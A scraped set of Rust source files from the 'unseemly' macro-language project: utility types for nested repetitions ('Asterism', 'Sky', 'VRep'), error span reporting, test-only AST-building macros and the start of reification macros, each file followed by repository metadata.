fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { self.as_slice().fmt(f) } } impl<T: fmt::Display> fmt::Display for AsterismSlice<'_, T> { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { if self.is_leaf() { write!(f, "{}", self.as_leaf()) } else { write!(f, "[")?; let mut first = true; for ref sub in self.march() { if !first { write!(f, " ")?; } write!(f, "{}", sub)?; first = false; } write!(f, "]") } } } impl<T: fmt::Display> fmt::Display for Asterism<T> { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { self.as_slice().fmt(f) } } impl<T: fmt::Debug> Asterism<T> { /// For internal debugging only fn show(&self) { for elt in &self.0 { match elt { LeafOrNode::Node(n) => print!("N{} ", n), LeafOrNode::PackedNodes => print!("PN "), LeafOrNode::Leaf(l) => print!("L{:?} ", l), } } } } #[test] fn asterism_basics() { let abc = Asterism::from_depth_1(vec!["a", "b", "c"]); assert_eq!(abc.as_slice().as_depth_1().collect::<Vec<_>>(), vec![&"a", &"b", &"c"]); let (a, b, c, d, e, f, g, h, i, j, k, l, m, n, o) = (0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14); let a_through_i = Asterism::join(vec![ Asterism::from_depth_1(vec![a, b]), Asterism::from_depth_1(vec![c]), Asterism::from_depth_1(vec![d, e]), Asterism::from_depth_1(vec![f, g]), Asterism::from_depth_1(vec![h, i]), ]); let a_through_m = Asterism::join(vec![ a_through_i, Asterism::join(vec![]), // Empty `Asterism`s can be deeper than they look Asterism::join(vec![Asterism::from_depth_1(vec![j, k, l, m])]), ]); let a_through_o = Asterism::join(vec![ a_through_m, Asterism::join(vec![Asterism::join(vec![ Asterism::from_depth_1(vec![n]), Asterism::from_depth_1(vec![o]), ])]), ]); assert_eq!( format!("{}", a_through_o), "[[[[0 1] [2] [3 4] [5 6] [7 8]] [[]] [[9 10 11 12]]] [[[13] [14]]]]" ); let mut expected_d1 = 0; let mut expected_m = 0; for m in a_through_o.march() { for mm in m.march() { for mmm in mm.march() { for mmmm in mmm.as_depth_1() { assert_eq!(*mmmm, expected_d1); expected_d1 += 1; } for mmmm in mmm.march() { assert_eq!(*mmmm.as_leaf(), expected_m); expected_m += 1; } } } } assert_eq!(15, expected_d1); assert_eq!(15, expected_m); let d1 = Asterism::from_depth_1(vec![vec![1, 3], vec![2, 3]]); for v in d1.as_depth_1() { assert_eq!(v.len(), 2) } }
rust
MIT
dd1f55be7b09b741a25af954c7a902eeac00a0c2
2026-01-04T20:20:52.848824Z
false
paulstansifer/unseemly
https://github.com/paulstansifer/unseemly/blob/dd1f55be7b09b741a25af954c7a902eeac00a0c2/src/util/err.rs
src/util/err.rs
use codespan_reporting::{ diagnostic::{Diagnostic, Label}, term::termcolor::{Ansi, ColorChoice, StandardStream, WriteColor}, }; use std::fmt::{Debug, Display, Formatter, Result}; custom_derive! { #[derive(Reifiable, Clone, PartialEq)] pub struct Spanned<T> { // The actual contents are ignored; only the span information is used. // (Unless the span is a ficitious `Ast`, which Should Not Happen, but does.) pub loc: crate::ast::Ast, pub body: T } } pub fn sp<T>(t: T, a: crate::ast::Ast) -> Spanned<T> { Spanned { loc: a, body: t } } impl<T: Display> Spanned<T> { pub fn emit_to_writer(&self, mut writer: &mut dyn WriteColor) { let diagnostic = Diagnostic::error().with_message(format!("{}", self.body)).with_labels(vec![ Label::primary(self.loc.0.file_id, self.loc.0.begin..self.loc.0.end), ]); let config = codespan_reporting::term::Config::default(); if let Err(_) = crate::earley::files.with(|f| { codespan_reporting::term::emit(&mut writer, &config, &*f.borrow(), &diagnostic) }) { writer.write(format!("[NO FILE] {} at {}", self.body, self.loc).as_bytes()).unwrap(); } } pub fn emit(&self) { let mut writer = StandardStream::stderr(ColorChoice::Always); self.emit_to_writer(&mut writer); } } // Temporary HACK: capture the ANSI terminal output in a string, // assuming we'll get printed to a terminal. impl<T: Display> Display for Spanned<T> { fn fmt(&self, f: &mut Formatter) -> Result { let mut writer = Ansi::new(Vec::<u8>::new()); self.emit_to_writer(&mut writer); write!(f, "{}", std::str::from_utf8(&writer.into_inner()).unwrap()) } } // Force pretty version impl<T: Display> Debug for Spanned<T> { fn fmt(&self, f: &mut Formatter) -> Result { let mut writer = Ansi::new(Vec::<u8>::new()); self.emit_to_writer(&mut writer); write!(f, "{}", std::str::from_utf8(&writer.into_inner()).unwrap()) } }
rust
MIT
dd1f55be7b09b741a25af954c7a902eeac00a0c2
2026-01-04T20:20:52.848824Z
false
paulstansifer/unseemly
https://github.com/paulstansifer/unseemly/blob/dd1f55be7b09b741a25af954c7a902eeac00a0c2/src/util/mod.rs
src/util/mod.rs
pub mod assoc; pub mod asterism; pub mod err; pub mod mbe; pub mod sky; pub mod vrep;
rust
MIT
dd1f55be7b09b741a25af954c7a902eeac00a0c2
2026-01-04T20:20:52.848824Z
false
paulstansifer/unseemly
https://github.com/paulstansifer/unseemly/blob/dd1f55be7b09b741a25af954c7a902eeac00a0c2/src/util/sky.rs
src/util/sky.rs
use crate::{ name::Name, util::{ assoc::Assoc, asterism::{AsterMarchable, Asterism, AsterismSlice}, }, }; use std::iter::Iterator; type Sky<T> = Assoc<Name, Asterism<T>>; /// `SkySlice` isn't a slice itself, /// so we can't pull the same trick we pulled with `AsterismSlice`. /// (Maybe rename it, then?) type SkySlice<'a, T> = Assoc<Name, AsterismSlice<'a, T>>; impl<'a, T> SkySlice<'a, T> where T: Clone { fn get(&self, n: Name) -> AsterismSlice<'a, T> { *self.find_or_panic(&n) } fn combine_overriding(&self, rhs: &Self) -> Assoc<Name, AsterismSlice<'a, T>> { self.set_assoc(rhs) } #[deprecated] // In `EnvMBE`, this respected named repeats. fn merge(&self, rhs: &Self) -> Assoc<Name, AsterismSlice<'a, T>> { self.set_assoc(rhs) } /// Each of `driving_names` must be a repetition of the same length. /// Produces an iterator with the same length, /// yielding `SkySlice`s in which the driven names have that repetition removed. fn march(&self, driving_names: &[Name]) -> Box<dyn Iterator<Item = SkySlice<'a, T>> + 'a> { let marchers: Vec<(Name, std::vec::IntoIter<AsterismSlice<'a, T>>)> = driving_names.iter().map(|n| (*n, self.get(*n).march())).collect(); // Require the lengths to be the same for (n, marcher) in &marchers[1..] { if marcher.len() != marchers[0].1.len() { icp!( "Lengths don't match in march names: {} ({}) != {} ({})", marcher.len(), n, marchers[0].1.len(), marchers[0].0 ); } } // By default, names refer to the same Asterims (just sliced) let mut res: Box<dyn Iterator<Item = SkySlice<'a, T>> + 'a> = Box::new(std::iter::repeat(self.clone())); // For the driving names, override with the current step of the march for (name, marched) in marchers { res = Box::new(res.zip(marched.into_iter()).map( move |(base, marched): (SkySlice<T>, AsterismSlice<T>)| base.set(name, marched), )); } res } #[deprecated(note = "use `march` instead")] // The `_all` is no longer meaningful. This does a bunch of unnecessary cloning. fn march_all(&self, driving_names: &[Name]) -> Vec<Sky<T>> { self.march(driving_names).map(|s| s.to_sky()).collect() } #[deprecated(note = "do we need this?")] fn get_leaf<'b>(&'b self, n: Name) -> Option<&'a T> { match self.find(&n) { None => None, Some(aster) => Some(aster.as_leaf()), } } fn leaf<'b>(&'b self, n: Name) -> &'a T where 'a: 'b { self.get(n).as_leaf() } #[deprecated(note = "use `leaf` instead")] fn get_leaf_or_panic(&self, n: Name) -> &T { self.get(n).as_leaf() } #[deprecated(note = "use `depth_1` instead")] fn get_rep_leaf(&self, n: Name) -> Option<Vec<&T>> { self.find(&n).map(|asterism| asterism.as_depth_1().collect::<Vec<&T>>()) } #[deprecated(note = "use `depth_1` instead")] fn get_rep_leaf_or_panic(&'a self, n: Name) -> Vec<&'a T> { self.get(n).as_depth_1().collect::<Vec<&T>>() } fn depth_1<'b>(&'b self, n: Name) -> Box<dyn std::iter::Iterator<Item = &'a T> + 'a> { self.get(n).as_depth_1() } // fn map_flatten_rep_leaf_or_panic<S>(&self, n: Name, depth: u8, m: &dyn Fn(&T) -> S, f: &dyn Fn(Vec<S>) -> S) -> S { // unimplemented!() // } } impl<T: Clone> SkySlice<'_, T> { pub fn to_sky(&self) -> Sky<T> { self.map_borrow_f(&mut |a: &AsterismSlice<T>| a.to_asterism()) } } impl<T: Clone> Sky<T> { // `l` could be a reference, but do we ever want that? pub fn new_from_leaves(l: Assoc<Name, T>) -> Self { l.map(|l| Asterism::from_leaf(l.clone())) } #[deprecated] pub fn new_from_named_repeat(_n: Name, r: Vec<Self>) -> Self { Self::new_from_anon_repeat(r) } pub fn new_from_anon_repeat(mut r: Vec<Self>) -> Self { if r.is_empty() { return Sky::new(); } let mut res = Assoc::<Name, Asterism<T>>::new(); if !r.is_empty() { let keys: Vec<Name> = r[0].iter_keys().copied().collect(); for k in keys { let per_name_asterisms: Vec<Asterism<T>> = r.iter_mut().map(|sky| sky.remove_or_panic(&k)).collect(); res = res.set(k, Asterism::join(per_name_asterisms)); } } res } pub fn leaf(&self, n: Name) -> &T { self.find_or_panic(&n).as_leaf() } pub fn depth_1<'b>(&'b self, n: Name) -> Box<dyn std::iter::Iterator<Item = &'b T> + 'b> { self.find_or_panic(&n).as_depth_1() } pub fn to_sky_slices<'b>(&'b self) -> SkySlice<'b, T> { self.map_borrow_f(&mut |a: &Asterism<T>| a.as_slice()) } pub fn march<'b>( &'b self, driving_names: &'b [Name], ) -> Box<dyn Iterator<Item = SkySlice<'b, T>> + 'b> { self.to_sky_slices().march(driving_names) } pub fn add_leaf(&mut self, n: Name, v: T) { self.mut_set(n, Asterism::from_leaf(v)); } #[deprecated(note = "inefficent, and named repeats are gone")] pub fn add_named_repeat(&mut self, _: Name, sub: Vec<Sky<T>>) { self.add_anon_repeat(sub) } // TODO: how DO we construct in a general case? #[deprecated(note = "inefficent")] pub fn add_anon_repeat(&mut self, sub: Vec<Sky<T>>) { if sub.is_empty() || sub[0].empty() { return; } for n in sub[0].iter_keys() { let asters: Vec<Asterism<T>> = sub.iter().map(|sky| sky.find_or_panic(n).clone()).collect(); self.mut_set(*n, Asterism::join(asters)); } } #[deprecated(note = "named repeats are gone")] pub fn anonimize_repeat(&mut self, _: Name) {} } // TODO: move these to macros.rs (and fully-qualify their names) macro_rules! asterism { ([$( $sub:tt ),*]) => { Asterism::join(vec![ $( asterism!($sub) ),* ]) }; ($leaf:expr) => { Asterism::from_leaf($leaf) }; } macro_rules! sky { ( $($n:tt => $rhs:tt),* ) => { assoc_n!( $( (stringify!($n)) => asterism!($rhs) ),* ) }; } #[test] fn sky_basics() { use crate::name::n; let abc: Sky<usize> = sky!( a => [[1, 2], [3], []], b => 9, c => [4, 5, 6], d => [7, 8] ); assert_eq!(abc.leaf(n("b")), &9); assert_eq!(abc.depth_1(n("c")).collect::<Vec<_>>(), vec![&4, &5, &6]); let mut cur_c = 4; for abccc in abc.march(&[n("c")]) { assert_eq!(abccc.leaf(n("b")), &9); assert_eq!(abccc.leaf(n("c")), &cur_c); cur_c += 1; assert_eq!(abccc.depth_1(n("d")).collect::<Vec<_>>(), vec![&7, &8]); } }
rust
MIT
dd1f55be7b09b741a25af954c7a902eeac00a0c2
2026-01-04T20:20:52.848824Z
false
paulstansifer/unseemly
https://github.com/paulstansifer/unseemly/blob/dd1f55be7b09b741a25af954c7a902eeac00a0c2/src/util/vrep.rs
src/util/vrep.rs
use crate::{ name::{n, Name}, runtime::reify::Reifiable, }; use std::iter::FromIterator; custom_derive! { #[derive(Clone, PartialEq, Eq, Debug, Reifiable)] pub enum VRepElt<T> { Single(T), Rep(T, Vec<Name>), } } impl<T> VRepElt<T> { pub fn map<'a, U, F>(&'a self, f: &mut F) -> VRepElt<U> where F: FnMut(&'a T) -> U { match self { Single(e) => Single(f(e)), Rep(e, names) => Rep(f(e), names.clone()), } } pub fn into_map<U, F>(self, f: &mut F) -> VRepElt<U> where F: FnMut(T) -> U { match self { Single(e) => Single(f(e)), Rep(e, names) => Rep(f(e), names), } } pub fn zip_map<U, F>(&self, other: &VRepElt<T>, mut f: F) -> Option<VRepElt<U>> where F: FnMut(&T, &T) -> U { match (self, other) { (Single(s), Single(r)) => Some(Single(f(s, r))), (Rep(s, s_names), Rep(r, r_names)) if s_names == r_names => { Some(Rep(f(s, r), s_names.clone())) } _ => None, } } } use VRepElt::*; #[derive(Debug, PartialEq, Eq)] pub enum VRepLen { Exactly(usize), AtLeast(usize), } #[derive(Clone, PartialEq, Eq)] pub struct VRep<T>(Vec<VRepElt<T>>); pub struct SRep<'a, T>(&'a [VRepElt<T>]); impl<T> VRep<T> { pub fn expand_reps<F>(&self, mut f: F) -> Vec<T> where F: FnMut(&T, &Vec<Name>) -> Vec<T>, T: Clone, { let mut res = vec![]; for elt in &self.0 { match elt { Single(e) => res.push(e.clone()), Rep(es, names) => { let mut expanded = f(es, names); res.append(&mut expanded) } } } res } pub fn concrete(&self) -> bool { for elt in &self.0 { match elt { Rep(_, _) => return false, Single(_) => {} } } return true; } pub fn is_empty(&self) -> bool { self.0.is_empty() } pub fn can_be_empty(&self) -> bool { for elt in &self.0 { match elt { Rep(_, _) => {} Single(_) => return false, } } return true; } pub fn len(&self) -> VRepLen { let mut min_len: usize = 0; let mut exact: bool = true; for elt in &self.0 { match elt { Single(_) => min_len += 1, Rep(_, _) => exact = false, } } if exact { VRepLen::Exactly(min_len) } else { VRepLen::AtLeast(min_len) } } pub fn iter(&self) -> std::slice::Iter<VRepElt<T>> { self.0.iter() } pub fn map<'a, U, F>(&'a self, mut f: F) -> VRep<U> where F: FnMut(&'a T) -> U { let mut res = vec![]; for elt in &self.0 { res.push(elt.map(&mut f)); } VRep(res) } pub fn into_map<U, F>(self, mut f: F) -> VRep<U> where F: FnMut(T) -> U { let mut res = vec![]; for elt in self.0 { res.push(elt.into_map(&mut f)); } VRep(res) } } // Only needed because our custom_derive! doesn't support newtype-style structs: impl<T: Clone + Reifiable> Reifiable for VRep<T> { fn ty_name() -> Name { n("VRep") } fn concrete_arguments() -> Option<Vec<crate::ast::Ast>> { Some(vec![T::ty_invocation()]) } fn reify(&self) -> crate::runtime::eval::Value { let res: Vec<_> = self.0.iter().map(|e| std::rc::Rc::new(e.reify())).collect(); crate::runtime::eval::Value::Sequence(res) } fn reflect(v: &crate::runtime::eval::Value) -> Self { let mut res = vec![]; extract!((v) crate::runtime::eval::Value::Sequence = (ref parts) => { for part in parts { res.push(<VRepElt<T>>::reflect(&**part)); } }); VRep(res) } } // Turns a plain Vec into a VRep without repetitions impl<T> From<Vec<T>> for VRep<T> { fn from(flat: Vec<T>) -> Self { VRep(flat.into_iter().map(Single).collect()) } } impl<T: std::fmt::Debug> std::fmt::Debug for VRep<T> { fn fmt(&self, f: &mut std::fmt::Formatter) -> std::fmt::Result { write!(f, "[")?; let mut first = false; for elt in &self.0 { if !first { write!(f, ", ")?; } first = false; match elt { Single(e) => write!(f, "{:?}", e)?, Rep(e, names) => write!(f, "{:?} ...({:?})", e, names)?, } } write!(f, "]") } } impl<T> IntoIterator for VRep<T> { type Item = VRepElt<T>; type IntoIter = std::vec::IntoIter<Self::Item>; fn into_iter(self) -> Self::IntoIter { self.0.into_iter() } } impl<'a, T: 'a> IntoIterator for &'a VRep<T> { type Item = &'a VRepElt<T>; type IntoIter = std::slice::Iter<'a, VRepElt<T>>; fn into_iter(self) -> Self::IntoIter { self.0.iter() } } impl<T> FromIterator<VRepElt<T>> for VRep<T> { fn from_iter<I: IntoIterator<Item = VRepElt<T>>>(iter: I) -> Self { let mut res = vec![]; for i in iter { res.push(i); } VRep(res) } } #[test] fn vrep_basics() { assert_eq!(vrep![1, 2, 3, 4, 5], VRep::from(vec![1, 2, 3, 4, 5])); assert_eq!(vrep![1, 2, 3, 4, 5].len(), VRepLen::Exactly(5)); let with_rep = vrep![1, 2 => (a, b, c), 3]; assert_eq!(with_rep.len(), VRepLen::AtLeast(2)); assert_eq!(with_rep.expand_reps(|_, _| vec![7, 7, 7]), vec![1, 7, 7, 7, 3]); // Reification roundtrip: assert_eq!(with_rep, <VRep<i32>>::reflect(&with_rep.reify())) }
rust
MIT
dd1f55be7b09b741a25af954c7a902eeac00a0c2
2026-01-04T20:20:52.848824Z
false
paulstansifer/unseemly
https://github.com/paulstansifer/unseemly/blob/dd1f55be7b09b741a25af954c7a902eeac00a0c2/src/macros/flimsy_syntax.rs
src/macros/flimsy_syntax.rs
#![macro_use] // For testing purposes, we want to generate valid `Ast`s, // but `ast!` is clunky and makes it *super* easy to leave off `Quote*` and `ExtendEnv` // and actually running the parser is a big dependency (and requires huge string literals). // so we introduce a `u!` macro that looks up forms but infers the internal structure. // It's weird to be relying on the grammar while ignoring parts of it, hence "flimsy", // but errors are much more likely to be compile-time than inscrutable test problems. // It's not unsafe to use `u!` for runtime operations, but there's a runtime cost, so don't do it. // TODO #20: Translate most `ast!`s in tests to `u!`s. // // `u!` is for expressions, and `uty!` is for types. // // Simple example: // `{apply : plus [one ; one]}` represents `(plus one one)`. // * Use a bareword (`apply`) to find the AST node, // and then put arguments in the order they appear in the syntax, // in this case, first the rator and then the rands. // * Use `[ ]` around a repeated argument. // * Variable references (`one`) and atoms are just plain barewords. // // Another example: // `{lambda : [a {Type Int :} ; b {Type Int :}] {apply : plus [a ; b]}}` // * Note that arguments repeated together can be grouped // (just put a semicolon between the repetitions). // * Also, you need to explicitly use `{Type <form_name> : ...}` or `{Expr <form_name> : ...}` // to switch nonterminals. // * Note that the difference between variable references and atoms is inferred. use crate::{ ast::{Ast, AstContents::*}, grammar::FormPat, name::*, util::mbe::EnvMBE, }; use std::iter::{Iterator, Peekable}; // AstContents to Ast macro_rules! raw_ast { ($ast_kind:ident) => { crate::ast::Ast(std::rc::Rc::new(crate::ast::LocatedAst { c: crate::ast::AstContents::$ast_kind, // TODO: would Rust file info be useful? file_id: 0, begin: 0, end: 0 })) }; ($ast_kind:ident ( $( $body:expr ),* ) ) => { crate::ast::Ast(std::rc::Rc::new(crate::ast::LocatedAst { c: crate::ast::AstContents::$ast_kind( $( $body ),* ), // TODO: would Rust file info be useful? file_id: 0, begin: 0, end: 0 })) } } macro_rules! atom { ($nm:tt) => { raw_ast!(Atom(crate::name::n($nm))) }; } // First, transforms from `[a b c; d e f; g h i]` to `[g h i] {[a b c] [d e f]}` // to get around a Rust macro parsing restriction, // then makes a REP flimsy shape for it. macro_rules! u_rep { ([; $( $ts:tt )*] $acc_cur:tt { $( $acc_rest:tt )* }) => { u_rep!( [ $( $ts )* ] [] { $( $acc_rest )* $acc_cur }) }; ([$t:tt $( $ts:tt )*] [ $( $acc_cur:tt )* ] { $( $acc_rest:tt )* }) => { u_rep!( [ $( $ts )* ] [$($acc_cur)* $t] { $( $acc_rest )* }) }; ([] [] {}) => { // Empty repeat raw_ast!(Shape(vec![atom!("REP")])) }; ([] [ $( $acc_cur:tt )* ] { $( [ $( $acc_rest:tt )* ] )* }) => { raw_ast!(Shape(vec![ atom!("REP"), $( u_shape_if_many!( $($acc_rest)* ), )* u_shape_if_many!( $($acc_cur)* ) ])) }; } macro_rules! u_shape_if_many { ($t:tt) => { u!($t) }; () => { compile_error!("empty u!") }; ( $($ts:tt)* ) => { u!((~ $($ts)* )) }; } thread_local! { pub static default_nt: std::cell::RefCell<String> = std::cell::RefCell::new("Expr".to_owned()); } macro_rules! u { ($atom:ident) => { // Default to this, because `Call` will use whatever it's given, without a grammar: raw_ast!(VariableReference(n(stringify!($atom)))) }; ( [ , $seq:expr ] ) => { { let mut contents: Vec<Ast> = $seq; contents.insert(0, atom!("REP")); raw_ast!(Shape(contents)) } }; ( [ $( $ts:tt )* ] ) => { u_rep!( [$($ts)*] [] {} ) }; ( { $form:ident : $( $ts:tt )*} ) => { { let f = crate::macros::flimsy_syntax::default_nt.with(|def_nt| { crate::core_forms::find_core_form(&def_nt.borrow(), stringify!($form)) }); raw_ast!(Node(f.clone(), crate::macros::flimsy_syntax::parse_flimsy_mbe(&u!( (~ $($ts)* ) ), &f.grammar) .unwrap_or_else(crate::util::mbe::EnvMBE::new), crate::beta::ExportBeta::Nothing)) } }; ( { $nt:ident $form:ident : $( $ts:tt )*} ) => { { let mut old_default_nt = "".to_owned(); let f = crate::macros::flimsy_syntax::default_nt.with(|def_nt| { old_default_nt = def_nt.borrow().clone(); let nt = stringify!($nt); *def_nt.borrow_mut() = nt.to_string(); crate::core_forms::find_core_form(&nt, stringify!($form)) }); let res = raw_ast!(Node(f.clone(), crate::macros::flimsy_syntax::parse_flimsy_mbe(&u!( (~ $($ts)* ) ), &f.grammar) .unwrap_or_else(crate::util::mbe::EnvMBE::new), crate::beta::ExportBeta::Nothing)); crate::macros::flimsy_syntax::default_nt.with(|def_nt| { *def_nt.borrow_mut() = old_default_nt; }); res } }; // The need for explicit exports is unfortunate; // that information is part of `Scope`, not `Form` (maybe we should change that?) ( { $form:ident => $ebeta:tt : $( $ts:tt )*} ) => { { let f = crate::macros::flimsy_syntax::default_nt.with(|def_nt| { crate::core_forms::find_core_form(&def_nt.borrow(), stringify!($form)) }); raw_ast!(Node(f.clone(), crate::macros::flimsy_syntax::parse_flimsy_mbe(&u!( (~ $($ts)* ) ), &f.grammar) .unwrap_or_else(crate::util::mbe::EnvMBE::new), ebeta!($ebeta))) } }; ( { $nt:ident $form:ident => $ebeta:tt : $( $ts:tt )*} ) => { { // code duplication from above ) : let mut old_default_nt = "".to_owned(); let f = crate::macros::flimsy_syntax::default_nt.with(|def_nt| { old_default_nt = def_nt.borrow().clone(); let nt = stringify!($nt); *def_nt.borrow_mut() = nt.to_string(); crate::core_forms::find_core_form(&nt, stringify!($form)) }); let res =raw_ast!(Node(f.clone(), crate::macros::flimsy_syntax::parse_flimsy_mbe(&u!( (~ $($ts)* ) ), &f.grammar) .unwrap_or_else(crate::util::mbe::EnvMBE::new), ebeta!($ebeta))); crate::macros::flimsy_syntax::default_nt.with(|def_nt| { *def_nt.borrow_mut() = old_default_nt; }); res } }; ( { $form:expr ; $( $ts:tt )*} ) => { { let f = $form; raw_ast!(Node(f.clone(), crate::macros::flimsy_syntax::parse_flimsy_mbe(&u!( (~ $($ts)* ) ), &f.grammar) .unwrap_or_else(crate::util::mbe::EnvMBE::new), crate::beta::ExportBeta::Nothing)) } }; ({ $( $anything:tt )* }) => { compile_error!("Needed a : or ; in u!"); }; // Currently, nested `Seq`s need to correspond to nested `SEQ`s, so this creates one explicitly: ((~ $($ts:tt)*)) => { raw_ast!(Shape(vec![ atom!("SEQ"), $( u!( $ts ) ),* ])) }; ((at $t:tt)) => { raw_ast!(Atom(n(stringify!($t)))) }; ((prim $t:tt)) => { crate::core_type_forms::get__primitive_type(n(stringify!($t))) }; ((, $interpolate:expr)) => { $interpolate }; // Two or more token trees (avoid infinite regress by not handling the one-element case) ( $t_first:tt $t_second:tt $( $t:tt )* ) => { raw_ast!(Shape(vec![ atom!("SEQ"), u!( $t_first ), u!( $t_second ), $( u!( $t ) ),* ])) }; } macro_rules! uty { ($( $ts:tt )*) => { { let mut old_default_nt = "".to_owned(); crate::macros::flimsy_syntax::default_nt.with(|def_nt| { old_default_nt = def_nt.borrow().clone(); *def_nt.borrow_mut() = "Type".to_owned(); }); let res = u!( $($ts)* ); crate::macros::flimsy_syntax::default_nt.with(|def_nt| { *def_nt.borrow_mut() = old_default_nt; }); res } }; } macro_rules! upat { ($( $ts:tt )*) => { { let mut old_default_nt = "".to_owned(); crate::macros::flimsy_syntax::default_nt.with(|def_nt| { old_default_nt = def_nt.borrow().clone(); *def_nt.borrow_mut() = "Pat".to_owned(); }); let res = u!( $($ts)* ); crate::macros::flimsy_syntax::default_nt.with(|def_nt| { *def_nt.borrow_mut() = old_default_nt; }); res } }; } fn parse_flimsy_seq<'a, I>(flimsy_seq: &mut Peekable<I>, grammar: &FormPat) -> EnvMBE<Ast> where I: Iterator<Item = &'a Ast> { use crate::grammar::FormPat::*; match grammar { Seq(ref grammar_parts) => { let mut result = EnvMBE::new(); for grammar_part in grammar_parts { result = result.combine_overriding(&parse_flimsy_seq(flimsy_seq, grammar_part)); } result } _ => { // `Anyways`es shouldn't consume anything (and they'll always be `Named`): let consuming = match grammar { Named(_, ref body) => match **body { Anyways(_) => false, // HACK: special case for core_macro_forms::macro_invocation. // There has to be a less flimsy way of doing this. QuoteDeepen(ref body, _) | QuoteEscape(ref body, _) => match **body { Anyways(_) => false, _ => true, }, _ => true, }, _ => true, }; let trivial = raw_ast!(Trivial); let flimsy = match flimsy_seq.peek() { None if consuming => return EnvMBE::new(), // Or is this an error? None => &trivial, Some(f) => f, }; match parse_flimsy_mbe(&flimsy, grammar) { None => EnvMBE::new(), Some(res) => { if consuming { let _ = flimsy_seq.next(); } res } } } } } pub fn parse_flimsy_mbe(flimsy: &Ast, grammar: &FormPat) -> Option<EnvMBE<Ast>> { use crate::grammar::FormPat::*; match grammar { Literal(_, _) => None, Call(_) => None, Scan(_, _) => None, Seq(_) => match flimsy.c() { Shape(flimsy_parts) => { if flimsy_parts[0].c() != &Atom(n("SEQ")) { panic!("Needed a SEQ, got {}", flimsy) } let mut fpi = flimsy_parts[1..].iter().peekable(); Some(parse_flimsy_seq(&mut fpi, grammar)) } _ => panic!("Needed a SEQ shape, got {}", flimsy), }, Star(ref body) | Plus(ref body) => match flimsy.c() { Shape(flimsy_parts) => { if flimsy_parts[0].c() != &Atom(n("REP")) { panic!("Need a REP, got {}", flimsy_parts[0]) } let mut reps = vec![]; for flimsy_part in flimsy_parts[1..].iter() { reps.push(parse_flimsy_mbe(flimsy_part, &*body).unwrap()); } Some(EnvMBE::new_from_anon_repeat(reps)) } _ => panic!("Needed a REP shape, got {}", flimsy), }, Alt(ref subs) => { // HACK: always pick the first branch of the `Alt` // (mainly affects unquotation, where it skips the type annotation) parse_flimsy_mbe(flimsy, &*subs[0]) } Named(name, ref body) => Some(EnvMBE::new_from_leaves( crate::util::assoc::Assoc::new().set(*name, parse_flimsy_ast(flimsy, &*body)), )), SynImport(_, _, _) => panic!("`SynImport` can't work without a real parser"), NameImport(_, _) => panic!("`NameImport` should live underneath `Named`: {:?}", grammar), _ => unimplemented!("Can't handle {:?}", grammar), } } fn parse_flimsy_ast(flimsy: &Ast, grammar: &FormPat) -> Ast { use crate::grammar::FormPat::*; match grammar { Anyways(ref a) => a.clone(), Impossible => unimplemented!(), Scan(_, _) => flimsy.clone(), Literal(_, _) => raw_ast!(Trivial), VarRef(_) => match flimsy.c() { VariableReference(a) => raw_ast!(VariableReference(*a)), non_atom => panic!("Needed an atom, got {}", non_atom), }, NameImport(body, beta) => { raw_ast!(ExtendEnv(parse_flimsy_ast(flimsy, &*body), beta.clone())) } NameImportPhaseless(body, beta) => { raw_ast!(ExtendEnvPhaseless(parse_flimsy_ast(flimsy, &*body), beta.clone())) } QuoteDeepen(body, pos) => raw_ast!(QuoteMore(parse_flimsy_ast(flimsy, &*body), *pos)), QuoteEscape(body, depth) => raw_ast!(QuoteLess(parse_flimsy_ast(flimsy, &*body), *depth)), Call(name) => { // HACK: don't descend into `Call(n("DefaultAtom")) if *name == n("DefaultAtom") || *name == n("AtomNotInPat") { match flimsy.c() { VariableReference(a) => raw_ast!(Atom(*a)), non_atom => panic!("Needed an atom, got {}", non_atom), } } else { flimsy.clone() } } _ => unimplemented!("Can't handle {:?}", grammar), } }
rust
MIT
dd1f55be7b09b741a25af954c7a902eeac00a0c2
2026-01-04T20:20:52.848824Z
false
paulstansifer/unseemly
https://github.com/paulstansifer/unseemly/blob/dd1f55be7b09b741a25af954c7a902eeac00a0c2/src/macros/reification_macros.rs
src/macros/reification_macros.rs
#![macro_use] // This isn't as bad as it looks. // I mean, it's pretty bad, don't get me wrong... // // The purpose is to generate `Reifiable` `impl`s // for any `enum` or `struct`. // // Basically, `reify` pattern-matches to destructure the actual Rust value, // and then constructs a `Value` of the corresponding shape. // // And `reflect` does the opposite. // // But, in the process, I have to work around // what feels like every single limitation of `macro_rules!` in Rust, // as if I were aiming for them. // // Who wrote that piece of junk, anyway? // // This should be rewritten, now that user-defined derives are stable. macro_rules! Reifiable { // HACK: everything is parameterized over 't... /* struct */ ((lifetime) $(#[$($whatever:tt)*])* $(pub)* struct $name:ident<$lifetime:tt> { $($contents:tt)* }) => { Reifiable!((remove_p_and_a) struct $name<$lifetime> @ { $($contents)*, } ); // HACK: we add commas to the end of the contents, becuase it's easier to parse // if they end in a comma (this breaks `structs` that already have final commas...) }; ((lifetime) $(#[$($whatever:tt)*])* $(pub)* struct $name:ident<$lifetime:tt $(, $ty_param_ty:ident)*> { $($contents:tt)* }) => { Reifiable!((remove_p_and_a) struct $name<$lifetime $(, $ty_param_ty)*> @ <$($ty_param_ty),*> { $($contents)*, } ); }; // no lifetime parameter (() $(#[$($whatever:tt)*])* $(pub)* struct $name:ident$(<$($ty_param_ty:ident),*>)* { $($contents:tt)* }) => { Reifiable!((remove_p_and_a) struct $name$(<$($ty_param_ty),*>)* @ $(<$($ty_param_ty),*>)* { $($contents)*, } ); }; // TODO: This lacks support for type-parameterized `struct`s ... // done! Go to `make_impl`! ((remove_p_and_a) $(pub)* struct $name:ident $(<$($ty_param:tt),*>)* @ $(<$($ty_param_ty:ident),*>)* { $(,)* } $( [ $( $accum:tt )* ] )* ) => { Reifiable!((make_impl) struct $name$(<$($ty_param),*>)* @ $(<$($ty_param_ty),*>)* { $($($accum)*)* } ); }; // remove `pub` ((remove_p_and_a) $(pub)* struct $name:ident $(<$($ty_param:tt),*>)* @ $(<$($ty_param_ty:ident),*>)* { pub $($contents:tt)* } $( [ $( $accum:tt )* ] )* ) => { Reifiable!((remove_p_and_a) struct $name$(<$($ty_param),*>)* @ $(<$($ty_param_ty),*>)* { $( $contents )* } $( [ $($accum)* ] )* ); }; // remove attributes (such as `///`!) ((remove_p_and_a) $(pub)* struct $name:ident $(<$($ty_param:tt),*>)* @ $(<$($ty_param_ty:ident),*>)* { 